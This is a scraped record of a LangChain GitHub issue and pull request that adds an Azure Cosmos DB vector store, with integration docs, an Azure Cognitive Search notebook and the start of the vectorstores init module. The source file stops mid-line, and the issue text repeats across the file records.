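For context, a minimal sketch of the underlying service API the PR builds on, using plain PyMongo. The command shape follows the Microsoft docs linked above at the time of this issue; the connection string, database, collection, and field names are placeholders, and the options under `cosmosSearchOptions` belong to the Cosmos DB service, not to LangChain:

```python
from pymongo import MongoClient

client = MongoClient("<your-vcore-connection-string>")  # placeholder
collection = client["docs_db"]["docs"]

# Create an IVF vector index using cosine similarity (per the linked docs).
client["docs_db"].command(
    {
        "createIndexes": "docs",
        "indexes": [
            {
                "name": "vector_index",
                "key": {"embedding": "cosmosSearch"},
                "cosmosSearchOptions": {
                    "kind": "vector-ivf",
                    "numLists": 1,
                    "similarity": "COS",
                    "dimensions": 1536,
                },
            }
        ],
    }
)

# Query for the 2 nearest neighbours of a query embedding.
results = collection.aggregate(
    [
        {
            "$search": {
                "cosmosSearch": {"vector": [0.1] * 1536, "path": "embedding", "k": 2},
                "returnStoredSource": True,
            }
        }
    ]
)
```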
https://github.com/langchain-ai/langchain/issues/11627
https://github.com/langchain-ai/langchain/pull/11632
28ee6a7c125f1eb209b6b6428d1a50040408ea9f
d0603c86b6dc559799c64033d330075a8744435e
"2023-10-10T20:55:53Z"
python
"2023-10-11T20:56:46Z"
docs/docs/integrations/platforms/microsoft.mdx
# Microsoft

All functionality related to Microsoft

## LLM

### Azure OpenAI

>[Microsoft Azure](https://en.wikipedia.org/wiki/Microsoft_Azure), often referred to as `Azure`, is a cloud computing platform run by `Microsoft`, which offers access, management, and development of applications and services through global data centers. It provides a range of capabilities, including software as a service (SaaS), platform as a service (PaaS), and infrastructure as a service (IaaS). `Microsoft Azure` supports many programming languages, tools, and frameworks, including Microsoft-specific and third-party software and systems.

>[Azure OpenAI](https://learn.microsoft.com/en-us/azure/cognitive-services/openai/) is an `Azure` service with powerful language models from `OpenAI` including the `GPT-3`, `Codex` and `Embeddings model` series for content generation, summarization, semantic search, and natural language to code translation.

```bash
pip install openai tiktoken
```

Set the environment variables to get access to the `Azure OpenAI` service.

```python
import os

os.environ["OPENAI_API_TYPE"] = "azure"
os.environ["OPENAI_API_BASE"] = "https://<your-endpoint>.openai.azure.com/"
os.environ["OPENAI_API_KEY"] = "your AzureOpenAI key"
os.environ["OPENAI_API_VERSION"] = "2023-05-15"
```

See a [usage example](/docs/integrations/llms/azure_openai_example).

```python
from langchain.llms import AzureOpenAI
```

## Text Embedding Models

### Azure OpenAI

See a [usage example](/docs/integrations/text_embedding/azureopenai)

```python
from langchain.embeddings import OpenAIEmbeddings
```

## Chat Models

### Azure OpenAI

See a [usage example](/docs/integrations/chat/azure_chat_openai)

```python
from langchain.chat_models import AzureChatOpenAI
```

## Document loaders

### Azure Blob Storage

>[Azure Blob Storage](https://learn.microsoft.com/en-us/azure/storage/blobs/storage-blobs-introduction) is Microsoft's object storage solution for the cloud. Blob Storage is optimized for storing massive amounts of unstructured data. Unstructured data is data that doesn't adhere to a particular data model or definition, such as text or binary data.

>[Azure Files](https://learn.microsoft.com/en-us/azure/storage/files/storage-files-introduction) offers fully managed
> file shares in the cloud that are accessible via the industry standard Server Message Block (`SMB`) protocol,
> Network File System (`NFS`) protocol, and `Azure Files REST API`. `Azure Files` is based on `Azure Blob Storage`.

`Azure Blob Storage` is designed for:
- Serving images or documents directly to a browser.
- Storing files for distributed access.
- Streaming video and audio.
- Writing to log files.
- Storing data for backup and restore, disaster recovery, and archiving.
- Storing data for analysis by an on-premises or Azure-hosted service.

```bash
pip install azure-storage-blob
```

See a [usage example for the Azure Blob Storage](/docs/integrations/document_loaders/azure_blob_storage_container.html).

```python
from langchain.document_loaders import AzureBlobStorageContainerLoader
```

See a [usage example for the Azure Files](/docs/integrations/document_loaders/azure_blob_storage_file.html).

```python
from langchain.document_loaders import AzureBlobStorageFileLoader
```

### Microsoft OneDrive

>[Microsoft OneDrive](https://en.wikipedia.org/wiki/OneDrive) (formerly `SkyDrive`) is a file-hosting service operated by Microsoft.

First, you need to install a python package.

```bash
pip install o365
```

See a [usage example](/docs/integrations/document_loaders/microsoft_onedrive).

```python
from langchain.document_loaders import OneDriveLoader
```

### Microsoft Word

>[Microsoft Word](https://www.microsoft.com/en-us/microsoft-365/word) is a word processor developed by Microsoft.

See a [usage example](/docs/integrations/document_loaders/microsoft_word).

```python
from langchain.document_loaders import UnstructuredWordDocumentLoader
```

## Retriever

### Azure Cognitive Search

>[Azure Cognitive Search](https://learn.microsoft.com/en-us/azure/search/search-what-is-azure-search) (formerly known as `Azure Search`) is a cloud search service that gives developers infrastructure, APIs, and tools for building a rich search experience over private, heterogeneous content in web, mobile, and enterprise applications.

>Search is foundational to any app that surfaces text to users, where common scenarios include catalog or document search, online retail apps, or data exploration over proprietary content. When you create a search service, you'll work with the following capabilities:
>- A search engine for full text search over a search index containing user-owned content
>- Rich indexing, with lexical analysis and optional AI enrichment for content extraction and transformation
>- Rich query syntax for text search, fuzzy search, autocomplete, geo-search and more
>- Programmability through REST APIs and client libraries in Azure SDKs
>- Azure integration at the data layer, machine learning layer, and AI (Cognitive Services)

See [set up instructions](https://learn.microsoft.com/en-us/azure/search/search-create-service-portal).

See a [usage example](/docs/integrations/retrievers/azure_cognitive_search).

```python
from langchain.retrievers import AzureCognitiveSearchRetriever
```
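A minimal usage sketch for that retriever. The service name, index name, and key are placeholders; the environment-variable names and the `content_key`/`top_k` parameters follow the LangChain docs for this integration, but treat them as assumptions if your version differs:

```python
import os

from langchain.retrievers import AzureCognitiveSearchRetriever

# Placeholders for your own service, index, and key.
os.environ["AZURE_COGNITIVE_SEARCH_SERVICE_NAME"] = "<your-service-name>"
os.environ["AZURE_COGNITIVE_SEARCH_INDEX_NAME"] = "<your-index-name>"
os.environ["AZURE_COGNITIVE_SEARCH_API_KEY"] = "<your-api-key>"

retriever = AzureCognitiveSearchRetriever(content_key="content", top_k=3)
docs = retriever.get_relevant_documents("what is Azure Cognitive Search?")
```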
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
11,627
Add AzureCosmosDBVectorSearch VectorStore
### Feature request

Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high-dimensional vector data directly in Azure Cosmos DB for MongoDB vCore. It supports similarity measures such as COS (cosine distance), L2 (Euclidean distance), and IP (inner product), which measure the distance between the data vectors and your query vector. The data vectors closest to your query vector are the most semantically similar and are retrieved at query time. The accompanying PR adds support for LangChain Python users to store vectors from document embeddings generated by APIs such as Azure OpenAI Embeddings or Hugging Face on Azure.

[Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search)

### Motivation

The capability described in this feature request is currently not available for LangChain Python.

### Your contribution

I will be submitting a PR for this feature request.
https://github.com/langchain-ai/langchain/issues/11627
https://github.com/langchain-ai/langchain/pull/11632
28ee6a7c125f1eb209b6b6428d1a50040408ea9f
d0603c86b6dc559799c64033d330075a8744435e
"2023-10-10T20:55:53Z"
python
"2023-10-11T20:56:46Z"
docs/docs/integrations/vectorstores/azure_cosmos_db.ipynb
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
11,627
Add AzureCosmosDBVectorSearch VectorStore
### Feature request

Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high-dimensional vector data directly in Azure Cosmos DB for MongoDB vCore. It supports similarity measures such as COS (cosine distance), L2 (Euclidean distance), and IP (inner product), which measure the distance between the data vectors and your query vector. The data vectors closest to your query vector are the most semantically similar and are retrieved at query time. The accompanying PR adds support for LangChain Python users to store vectors from document embeddings generated by APIs such as Azure OpenAI Embeddings or Hugging Face on Azure.

[Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search)

### Motivation

The capability described in this feature request is currently not available for LangChain Python.

### Your contribution

I will be submitting a PR for this feature request.
https://github.com/langchain-ai/langchain/issues/11627
https://github.com/langchain-ai/langchain/pull/11632
28ee6a7c125f1eb209b6b6428d1a50040408ea9f
d0603c86b6dc559799c64033d330075a8744435e
"2023-10-10T20:55:53Z"
python
"2023-10-11T20:56:46Z"
docs/docs/integrations/vectorstores/azuresearch.ipynb
{ "cells": [ { "cell_type": "markdown", "metadata": {}, "source": [ "# Azure Cognitive Search\n", "\n", "[Azure Cognitive Search](https://learn.microsoft.com/azure/search/search-what-is-azure-search) (formerly known as `Azure Search`) is a cloud search service that gives developers infrastructure, APIs, and tools for building a rich search experience over private, heterogeneous content in web, mobile, and enterprise applications.\n", "\n", "Vector search is currently in public preview. It's available through the Azure portal, preview REST API and beta client libraries. [More info](https://learn.microsoft.com/en-us/azure/search/vector-search-overview) Beta client libraries are subject to potential breaking changes, please be sure to use the SDK package version identified below. azure-search-documents==11.4.0b8" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "# Install Azure Cognitive Search SDK" ] }, { "cell_type": "code", "execution_count": null, "metadata": {}, "outputs": [], "source": [ "!pip install azure-search-documents==11.4.0b8\n", "!pip install azure-identity" ] }, { "attachments": {}, "cell_type": "markdown", "metadata": {}, "source": [ "## Import required libraries" ] }, { "cell_type": "code", "execution_count": 1, "metadata": {}, "outputs": [], "source": [ "import openai\n", "import os\n", "from langchain.embeddings import OpenAIEmbeddings\n", "from langchain.vectorstores.azuresearch import AzureSearch" ] }, { "attachments": {}, "cell_type": "markdown", "metadata": {}, "source": [ "## Configure OpenAI settings\n", "Configure the OpenAI settings to use Azure OpenAI or OpenAI" ] }, { "cell_type": "code", "execution_count": 2, "metadata": {}, "outputs": [], "source": [ "os.environ[\"OPENAI_API_TYPE\"] = \"azure\"\n", "os.environ[\"OPENAI_API_BASE\"] = \"YOUR_OPENAI_ENDPOINT\"\n", "os.environ[\"OPENAI_API_KEY\"] = \"YOUR_OPENAI_API_KEY\"\n", "os.environ[\"OPENAI_API_VERSION\"] = \"2023-05-15\"\n", "model: str = \"text-embedding-ada-002\"" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Configure vector store settings\n", " \n", "Set up the vector store settings using environment variables:" ] }, { "cell_type": "code", "execution_count": 3, "metadata": {}, "outputs": [], "source": [ "vector_store_address: str = \"YOUR_AZURE_SEARCH_ENDPOINT\"\n", "vector_store_password: str = \"YOUR_AZURE_SEARCH_ADMIN_KEY\"" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Create embeddings and vector store instances\n", " \n", "Create instances of the OpenAIEmbeddings and AzureSearch classes:" ] }, { "cell_type": "code", "execution_count": 4, "metadata": {}, "outputs": [], "source": [ "embeddings: OpenAIEmbeddings = OpenAIEmbeddings(deployment=model, chunk_size=1)\n", "index_name: str = \"langchain-vector-demo\"\n", "vector_store: AzureSearch = AzureSearch(\n", " azure_search_endpoint=vector_store_address,\n", " azure_search_key=vector_store_password,\n", " index_name=index_name,\n", " embedding_function=embeddings.embed_query,\n", ")" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Insert text and embeddings into vector store\n", " \n", "Add texts and metadata from the JSON data to the vector store:" ] }, { "cell_type": "code", "execution_count": null, "metadata": {}, "outputs": [], "source": [ "from langchain.document_loaders import TextLoader\n", "from langchain.text_splitter import CharacterTextSplitter\n", "\n", "loader = TextLoader(\"../../../state_of_the_union.txt\", encoding=\"utf-8\")\n", "\n", "documents = loader.load()\n", 
"text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)\n", "docs = text_splitter.split_documents(documents)\n", "\n", "vector_store.add_documents(documents=docs)" ] }, { "attachments": {}, "cell_type": "markdown", "metadata": {}, "source": [ "## Perform a vector similarity search\n", " \n", "Execute a pure vector similarity search using the similarity_search() method:" ] }, { "cell_type": "code", "execution_count": 5, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "Tonight. I call on the Senate to: Pass the Freedom to Vote Act. Pass the John Lewis Voting Rights Act. And while you’re at it, pass the Disclose Act so Americans can know who is funding our elections. \n", "\n", "Tonight, I’d like to honor someone who has dedicated his life to serve this country: Justice Stephen Breyer—an Army veteran, Constitutional scholar, and retiring Justice of the United States Supreme Court. Justice Breyer, thank you for your service. \n", "\n", "One of the most serious constitutional responsibilities a President has is nominating someone to serve on the United States Supreme Court. \n", "\n", "And I did that 4 days ago, when I nominated Circuit Court of Appeals Judge Ketanji Brown Jackson. One of our nation’s top legal minds, who will continue Justice Breyer’s legacy of excellence.\n" ] } ], "source": [ "# Perform a similarity search\n", "docs = vector_store.similarity_search(\n", " query=\"What did the president say about Ketanji Brown Jackson\",\n", " k=3,\n", " search_type=\"similarity\",\n", ")\n", "print(docs[0].page_content)" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Perform a vector similarity search with relevance scores\n", " \n", "Execute a pure vector similarity search using the similarity_search_with_relevance_scores() method:" ] }, { "cell_type": "code", "execution_count": 12, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "[(Document(page_content='Tonight. I call on the Senate to: Pass the Freedom to Vote Act. Pass the John Lewis Voting Rights Act. And while you’re at it, pass the Disclose Act so Americans can know who is funding our elections. \\n\\nTonight, I’d like to honor someone who has dedicated his life to serve this country: Justice Stephen Breyer—an Army veteran, Constitutional scholar, and retiring Justice of the United States Supreme Court. Justice Breyer, thank you for your service. \\n\\nOne of the most serious constitutional responsibilities a President has is nominating someone to serve on the United States Supreme Court. \\n\\nAnd I did that 4 days ago, when I nominated Circuit Court of Appeals Judge Ketanji Brown Jackson. One of our nation’s top legal minds, who will continue Justice Breyer’s legacy of excellence.', metadata={'source': 'C:\\\\repos\\\\langchain-fruocco-acs\\\\langchain\\\\docs\\\\extras\\\\modules\\\\state_of_the_union.txt'}),\n", " 0.8441472),\n", " (Document(page_content='Tonight. I call on the Senate to: Pass the Freedom to Vote Act. Pass the John Lewis Voting Rights Act. And while you’re at it, pass the Disclose Act so Americans can know who is funding our elections. \\n\\nTonight, I’d like to honor someone who has dedicated his life to serve this country: Justice Stephen Breyer—an Army veteran, Constitutional scholar, and retiring Justice of the United States Supreme Court. Justice Breyer, thank you for your service. 
\\n\\nOne of the most serious constitutional responsibilities a President has is nominating someone to serve on the United States Supreme Court. \\n\\nAnd I did that 4 days ago, when I nominated Circuit Court of Appeals Judge Ketanji Brown Jackson. One of our nation’s top legal minds, who will continue Justice Breyer’s legacy of excellence.', metadata={'source': 'C:\\\\repos\\\\langchain-fruocco-acs\\\\langchain\\\\docs\\\\extras\\\\modules\\\\state_of_the_union.txt'}),\n", " 0.8441472),\n", " (Document(page_content='A former top litigator in private practice. A former federal public defender. And from a family of public school educators and police officers. A consensus builder. Since she’s been nominated, she’s received a broad range of support—from the Fraternal Order of Police to former judges appointed by Democrats and Republicans. \\n\\nAnd if we are to advance liberty and justice, we need to secure the Border and fix the immigration system. \\n\\nWe can do both. At our border, we’ve installed new technology like cutting-edge scanners to better detect drug smuggling. \\n\\nWe’ve set up joint patrols with Mexico and Guatemala to catch more human traffickers. \\n\\nWe’re putting in place dedicated immigration judges so families fleeing persecution and violence can have their cases heard faster. \\n\\nWe’re securing commitments and supporting partners in South and Central America to host more refugees and secure their own borders.', metadata={'source': 'C:\\\\repos\\\\langchain-fruocco-acs\\\\langchain\\\\docs\\\\extras\\\\modules\\\\state_of_the_union.txt'}),\n", " 0.82153815),\n", " (Document(page_content='A former top litigator in private practice. A former federal public defender. And from a family of public school educators and police officers. A consensus builder. Since she’s been nominated, she’s received a broad range of support—from the Fraternal Order of Police to former judges appointed by Democrats and Republicans. \\n\\nAnd if we are to advance liberty and justice, we need to secure the Border and fix the immigration system. \\n\\nWe can do both. At our border, we’ve installed new technology like cutting-edge scanners to better detect drug smuggling. \\n\\nWe’ve set up joint patrols with Mexico and Guatemala to catch more human traffickers. \\n\\nWe’re putting in place dedicated immigration judges so families fleeing persecution and violence can have their cases heard faster. \\n\\nWe’re securing commitments and supporting partners in South and Central America to host more refugees and secure their own borders.', metadata={'source': 'C:\\\\repos\\\\langchain-fruocco-acs\\\\langchain\\\\docs\\\\extras\\\\modules\\\\state_of_the_union.txt'}),\n", " 0.82153815)]\n" ] } ], "source": [ "docs_and_scores = vector_store.similarity_search_with_relevance_scores(query=\"What did the president say about Ketanji Brown Jackson\", k=4, score_threshold=0.80)\n", "from pprint import pprint\n", "pprint(docs_and_scores)" ] }, { "attachments": {}, "cell_type": "markdown", "metadata": {}, "source": [ "## Perform a Hybrid Search\n", "\n", "Execute hybrid search using the search_type or hybrid_search() method:" ] }, { "cell_type": "code", "execution_count": 13, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "Tonight. I call on the Senate to: Pass the Freedom to Vote Act. Pass the John Lewis Voting Rights Act. And while you’re at it, pass the Disclose Act so Americans can know who is funding our elections. 
\n", "\n", "Tonight, I’d like to honor someone who has dedicated his life to serve this country: Justice Stephen Breyer—an Army veteran, Constitutional scholar, and retiring Justice of the United States Supreme Court. Justice Breyer, thank you for your service. \n", "\n", "One of the most serious constitutional responsibilities a President has is nominating someone to serve on the United States Supreme Court. \n", "\n", "And I did that 4 days ago, when I nominated Circuit Court of Appeals Judge Ketanji Brown Jackson. One of our nation’s top legal minds, who will continue Justice Breyer’s legacy of excellence.\n" ] } ], "source": [ "# Perform a hybrid search\n", "docs = vector_store.similarity_search(\n", " query=\"What did the president say about Ketanji Brown Jackson\",\n", " k=3, \n", " search_type=\"hybrid\"\n", ")\n", "print(docs[0].page_content)" ] }, { "cell_type": "code", "execution_count": 14, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "Tonight. I call on the Senate to: Pass the Freedom to Vote Act. Pass the John Lewis Voting Rights Act. And while you’re at it, pass the Disclose Act so Americans can know who is funding our elections. \n", "\n", "Tonight, I’d like to honor someone who has dedicated his life to serve this country: Justice Stephen Breyer—an Army veteran, Constitutional scholar, and retiring Justice of the United States Supreme Court. Justice Breyer, thank you for your service. \n", "\n", "One of the most serious constitutional responsibilities a President has is nominating someone to serve on the United States Supreme Court. \n", "\n", "And I did that 4 days ago, when I nominated Circuit Court of Appeals Judge Ketanji Brown Jackson. One of our nation’s top legal minds, who will continue Justice Breyer’s legacy of excellence.\n" ] } ], "source": [ "# Perform a hybrid search\n", "docs = vector_store.hybrid_search(\n", " query=\"What did the president say about Ketanji Brown Jackson\", \n", " k=3\n", ")\n", "print(docs[0].page_content)" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "# Create a new index with custom filterable fields " ] }, { "cell_type": "code", "execution_count": 18, "metadata": {}, "outputs": [], "source": [ "from azure.search.documents.indexes.models import (\n", " SearchableField,\n", " SearchField,\n", " SearchFieldDataType,\n", " SimpleField,\n", " ScoringProfile,\n", " TextWeights,\n", ")\n", "\n", "embeddings: OpenAIEmbeddings = OpenAIEmbeddings(deployment=model, chunk_size=1)\n", "embedding_function = embeddings.embed_query\n", "\n", "fields = [\n", " SimpleField(\n", " name=\"id\",\n", " type=SearchFieldDataType.String,\n", " key=True,\n", " filterable=True,\n", " ),\n", " SearchableField(\n", " name=\"content\",\n", " type=SearchFieldDataType.String,\n", " searchable=True,\n", " ),\n", " SearchField(\n", " name=\"content_vector\",\n", " type=SearchFieldDataType.Collection(SearchFieldDataType.Single),\n", " searchable=True,\n", " vector_search_dimensions=len(embedding_function(\"Text\")),\n", " vector_search_configuration=\"default\",\n", " ),\n", " SearchableField(\n", " name=\"metadata\",\n", " type=SearchFieldDataType.String,\n", " searchable=True,\n", " ),\n", " # Additional field to store the title\n", " SearchableField(\n", " name=\"title\",\n", " type=SearchFieldDataType.String,\n", " searchable=True,\n", " ),\n", " # Additional field for filtering on document source\n", " SimpleField(\n", " name=\"source\",\n", " type=SearchFieldDataType.String,\n", " filterable=True,\n", " ),\n", 
"]\n", "\n", "index_name: str = \"langchain-vector-demo-custom\"\n", "\n", "vector_store: AzureSearch = AzureSearch(\n", " azure_search_endpoint=vector_store_address,\n", " azure_search_key=vector_store_password,\n", " index_name=index_name,\n", " embedding_function=embedding_function,\n", " fields=fields,\n", ")\n" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "# Perform a query with a custom filter" ] }, { "cell_type": "code", "execution_count": 19, "metadata": {}, "outputs": [], "source": [ "# Data in the metadata dictionary with a corresponding field in the index will be added to the index\n", "# In this example, the metadata dictionary contains a title, a source and a random field\n", "# The title and the source will be added to the index as separate fields, but the random won't. (as it is not defined in the fields list)\n", "# The random field will be only stored in the metadata field\n", "vector_store.add_texts(\n", " [\"Test 1\", \"Test 2\", \"Test 3\"],\n", " [\n", " {\"title\": \"Title 1\", \"source\": \"A\", \"random\": \"10290\"},\n", " {\"title\": \"Title 2\", \"source\": \"A\", \"random\": \"48392\"},\n", " {\"title\": \"Title 3\", \"source\": \"B\", \"random\": \"32893\"},\n", " ],\n", ")\n" ] }, { "cell_type": "code", "execution_count": 20, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "[Document(page_content='Test 3', metadata={'title': 'Title 3', 'source': 'B', 'random': '32893'}),\n", " Document(page_content='Test 1', metadata={'title': 'Title 1', 'source': 'A', 'random': '10290'}),\n", " Document(page_content='Test 2', metadata={'title': 'Title 2', 'source': 'A', 'random': '48392'})]" ] }, "execution_count": 12, "metadata": {}, "output_type": "execute_result" } ], "source": [ "res = vector_store.similarity_search(query=\"Test 3 source1\", k=3, search_type=\"hybrid\")\n", "res" ] }, { "cell_type": "code", "execution_count": 21, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "[Document(page_content='Test 1', metadata={'title': 'Title 1', 'source': 'A', 'random': '10290'}),\n", " Document(page_content='Test 2', metadata={'title': 'Title 2', 'source': 'A', 'random': '48392'})]" ] }, "execution_count": 13, "metadata": {}, "output_type": "execute_result" } ], "source": [ "res = vector_store.similarity_search(query=\"Test 3 source1\", k=3, search_type=\"hybrid\", filters=\"source eq 'A'\")\n", "res" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "# Create a new index with a Scoring Profile" ] }, { "cell_type": "code", "execution_count": 22, "metadata": {}, "outputs": [], "source": [ "from azure.search.documents.indexes.models import (\n", " SearchableField,\n", " SearchField,\n", " SearchFieldDataType,\n", " SimpleField,\n", " ScoringProfile,\n", " TextWeights,\n", " ScoringFunction,\n", " FreshnessScoringFunction,\n", " FreshnessScoringParameters\n", ")\n", "\n", "embeddings: OpenAIEmbeddings = OpenAIEmbeddings(deployment=model, chunk_size=1)\n", "embedding_function = embeddings.embed_query\n", "\n", "fields = [\n", " SimpleField(\n", " name=\"id\",\n", " type=SearchFieldDataType.String,\n", " key=True,\n", " filterable=True,\n", " ),\n", " SearchableField(\n", " name=\"content\",\n", " type=SearchFieldDataType.String,\n", " searchable=True,\n", " ),\n", " SearchField(\n", " name=\"content_vector\",\n", " type=SearchFieldDataType.Collection(SearchFieldDataType.Single),\n", " searchable=True,\n", " vector_search_dimensions=len(embedding_function(\"Text\")),\n", " vector_search_configuration=\"default\",\n", " ),\n", " 
SearchableField(\n", " name=\"metadata\",\n", " type=SearchFieldDataType.String,\n", " searchable=True,\n", " ),\n", " # Additional field to store the title\n", " SearchableField(\n", " name=\"title\",\n", " type=SearchFieldDataType.String,\n", " searchable=True,\n", " ),\n", " # Additional field for filtering on document source\n", " SimpleField(\n", " name=\"source\",\n", " type=SearchFieldDataType.String,\n", " filterable=True,\n", " ),\n", " # Additional data field for last doc update\n", " SimpleField(\n", " name=\"last_update\",\n", " type=SearchFieldDataType.DateTimeOffset,\n", " searchable=True,\n", " filterable=True\n", " )\n", "]\n", "# Adding a custom scoring profile with a freshness function\n", "sc_name = \"scoring_profile\"\n", "sc = ScoringProfile(\n", " name=sc_name,\n", " text_weights=TextWeights(weights={\"title\": 5}),\n", " function_aggregation=\"sum\",\n", " functions=[\n", " FreshnessScoringFunction(\n", " field_name=\"last_update\",\n", " boost=100,\n", " parameters=FreshnessScoringParameters(boosting_duration=\"P2D\"),\n", " interpolation=\"linear\"\n", " )\n", " ]\n", ")\n", "\n", "index_name = \"langchain-vector-demo-custom-scoring-profile\"\n", "\n", "vector_store: AzureSearch = AzureSearch(\n", " azure_search_endpoint=vector_store_address,\n", " azure_search_key=vector_store_password,\n", " index_name=index_name,\n", " embedding_function=embeddings.embed_query,\n", " fields=fields,\n", " scoring_profiles = [sc],\n", " default_scoring_profile = sc_name\n", ")" ] }, { "cell_type": "code", "execution_count": 23, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "['NjQyNTI5ZmMtNmVkYS00Njg5LTk2ZDgtMjM3OTY4NTJkYzFj',\n", " 'M2M0MGExZjAtMjhiZC00ZDkwLThmMTgtODNlN2Y2ZDVkMTMw',\n", " 'ZmFhMDE1NzMtMjZjNS00MTFiLTk0MTEtNGRkYjgwYWQwOTI0']" ] }, "execution_count": 16, "metadata": {}, "output_type": "execute_result" } ], "source": [ "# Adding same data with different last_update to show Scoring Profile effect\n", "from datetime import datetime, timedelta\n", "\n", "today = datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%S-00:00')\n", "yesterday = (datetime.utcnow() - timedelta(days=1)).strftime('%Y-%m-%dT%H:%M:%S-00:00')\n", "one_month_ago = (datetime.utcnow() - timedelta(days=30)).strftime('%Y-%m-%dT%H:%M:%S-00:00')\n", "\n", "vector_store.add_texts(\n", " [\"Test 1\", \"Test 1\", \"Test 1\"],\n", " [\n", " {\"title\": \"Title 1\", \"source\": \"source1\", \"random\": \"10290\", \"last_update\": today},\n", " {\"title\": \"Title 1\", \"source\": \"source1\", \"random\": \"48392\", \"last_update\": yesterday},\n", " {\"title\": \"Title 1\", \"source\": \"source1\", \"random\": \"32893\", \"last_update\": one_month_ago},\n", " ],\n", ")\n" ] }, { "cell_type": "code", "execution_count": 24, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "[Document(page_content='Test 1', metadata={'title': 'Title 1', 'source': 'source1', 'random': '10290', 'last_update': '2023-07-13T10:47:39-00:00'}),\n", " Document(page_content='Test 1', metadata={'title': 'Title 1', 'source': 'source1', 'random': '48392', 'last_update': '2023-07-12T10:47:39-00:00'}),\n", " Document(page_content='Test 1', metadata={'title': 'Title 1', 'source': 'source1', 'random': '32893', 'last_update': '2023-06-13T10:47:39-00:00'})]" ] }, "execution_count": 17, "metadata": {}, "output_type": "execute_result" } ], "source": [ "res = vector_store.similarity_search(query=\"Test 1\", k=3, search_type=\"similarity\")\n", "res" ] }, { "cell_type": "code", "execution_count": null, "metadata": {}, "outputs": [], "source": 
[] } ], "metadata": { "kernelspec": { "display_name": "Python 3.9.13 ('.venv': venv)", "language": "python", "name": "python3" }, "language_info": { "codemirror_mode": { "name": "ipython", "version": 3 }, "file_extension": ".py", "mimetype": "text/x-python", "name": "python", "nbconvert_exporter": "python", "pygments_lexer": "ipython3", "version": "3.9.13" }, "orig_nbformat": 4, "vscode": { "interpreter": { "hash": "645053d6307d413a1a75681b5ebb6449bb2babba4bcb0bf65a1ddc3dbefb108a" } } }, "nbformat": 4, "nbformat_minor": 2 }
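Once populated, the store built in this notebook drops into LangChain's standard retriever interface. A minimal sketch (assumes the notebook's `vector_store` is in scope; the chat deployment name is a placeholder):

```python
from langchain.chains import RetrievalQA
from langchain.chat_models import AzureChatOpenAI

# `vector_store` is the AzureSearch instance built earlier in this notebook;
# the deployment name is a placeholder for your own chat model deployment.
llm = AzureChatOpenAI(deployment_name="<your-chat-deployment>", temperature=0)
qa = RetrievalQA.from_chain_type(
    llm=llm,
    chain_type="stuff",
    retriever=vector_store.as_retriever(),
)
print(qa.run("What did the president say about Ketanji Brown Jackson?"))
```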
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
11,627
Add AzureCosmosDBVectorSearch VectorStore
### Feature request

Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high-dimensional vector data directly in Azure Cosmos DB for MongoDB vCore. It supports similarity measures such as COS (cosine distance), L2 (Euclidean distance), and IP (inner product), which measure the distance between the data vectors and your query vector. The data vectors closest to your query vector are the most semantically similar and are retrieved at query time. The accompanying PR adds support for LangChain Python users to store vectors from document embeddings generated by APIs such as Azure OpenAI Embeddings or Hugging Face on Azure.

[Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search)

### Motivation

The capability described in this feature request is currently not available for LangChain Python.

### Your contribution

I will be submitting a PR for this feature request.
https://github.com/langchain-ai/langchain/issues/11627
https://github.com/langchain-ai/langchain/pull/11632
28ee6a7c125f1eb209b6b6428d1a50040408ea9f
d0603c86b6dc559799c64033d330075a8744435e
"2023-10-10T20:55:53Z"
python
"2023-10-11T20:56:46Z"
libs/langchain/langchain/vectorstores/__init__.py
"""**Vector store** stores embedded data and performs vector search. One of the most common ways to store and search over unstructured data is to embed it and store the resulting embedding vectors, and then query the store and retrieve the data that are 'most similar' to the embedded query. **Class hierarchy:** .. code-block:: VectorStore --> <name> # Examples: Annoy, FAISS, Milvus BaseRetriever --> VectorStoreRetriever --> <name>Retriever # Example: VespaRetriever **Main helpers:** .. code-block:: Embeddings, Document """ # noqa: E501 from typing import Any from langchain.schema.vectorstore import VectorStore def _import_alibaba_cloud_open_search() -> Any: from langchain.vectorstores.alibabacloud_opensearch import AlibabaCloudOpenSearch return AlibabaCloudOpenSearch def _import_alibaba_cloud_open_search_settings() -> Any: from langchain.vectorstores.alibabacloud_opensearch import ( AlibabaCloudOpenSearchSettings, ) return AlibabaCloudOpenSearchSettings def _import_elastic_knn_search() -> Any: from langchain.vectorstores.elastic_vector_search import ElasticKnnSearch return ElasticKnnSearch def _import_elastic_vector_search() -> Any: from langchain.vectorstores.elastic_vector_search import ElasticVectorSearch return ElasticVectorSearch def _import_analyticdb() -> Any: from langchain.vectorstores.analyticdb import AnalyticDB return AnalyticDB def _import_annoy() -> Any: from langchain.vectorstores.annoy import Annoy return Annoy def _import_atlas() -> Any: from langchain.vectorstores.atlas import AtlasDB return AtlasDB def _import_awadb() -> Any: from langchain.vectorstores.awadb 